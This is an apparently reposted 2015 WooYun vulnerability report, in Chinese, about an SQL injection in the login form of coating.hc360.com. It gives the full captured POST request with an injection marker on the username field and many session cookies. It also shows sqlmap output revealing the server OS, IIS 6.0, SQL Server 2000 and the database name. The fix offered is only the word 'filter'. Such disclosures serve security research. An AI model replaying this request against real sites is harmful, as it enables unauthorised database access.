记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

慧聪网某分站SQL注入

2015-03-06 23:05

问题分站:http://coating.hc360.com

QQ图片20150120205944.png





用户帐号处输入单引号,即可报错。

QQ图片20150120210149.jpg





抓包直接丢sqlmap中

code 区域
POST /Default.asp? HTTP/1.1

Host: coating.hc360.com

Proxy-Connection: keep-alive

Content-Length: 54

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://coating.hc360.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://coating.hc360.com/Default.asp?

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2

Cookie: visitid_time=2015-1-20%2019%3A42%3A2; hc360visitid=C676FD3E34E00001ADE93C001910154D; hcbrowserid=C676FD3E35200001CBF61990AF601D1F; hckIndex=C676FD3E35B00001133D3FCB90C01813; anonymousUser=1501201942730624; user-key=C241621D4C5000018FE01E80E92016D6; hcsearch=2015012019443338020.361300119; Hm_lvt_06474281345ff890f5e038e643844bbf=1421754474; hc360analyid=C676FEB667500001EE8F15D31E7C17BC; hc360analycopyid=C676FEB66760000184574500720010AD; hcpreurl=; hcsearchurlport=1; 8J5J_24da_saltkey=O4041ZPy; 8J5J_24da_lastvisit=1421752123; contactViewCount=1; hccordet=01; hclastsearchkeyword=%u5929%u6D25%u96C6%u88C5%u7BB1; Hm_lvt_4fea1a6421a72296a12cd7898b93858e=1421756463; Hm_lpvt_4fea1a6421a72296a12cd7898b93858e=1421756680; 8J5J_24da_lastact=1421756702%09api.php%09js; urgeStay=55%3B2; Hm_lvt_e1e386be074a459371b2832363c0d7e7=1421754458,1421755426,1421755620,1421755663; Hm_lpvt_e1e386be074a459371b2832363c0d7e7=1421757063; hc5minbeat=1421757063191; ASPSESSIONIDCQBBBDBC=KHLBAHADCIDMLPIEKOBDHCOM



txtUser=*&txtPassword=123456&btnSave=+%B5%C7+%C2%BC+





code 区域
web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0

back-end DBMS: Microsoft SQL Server 2000



current database: 'Coatingsss'







QQ图片20150120210258.jpg





QQ图片20150120211459.jpg





跑数据较慢,这里证明即可,不再深入。

漏洞证明:

修复方案:

过滤


知识来源: www.wooyun.org/bugs/wooyun-2015-092995

阅读:117031 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“慧聪网某分站SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词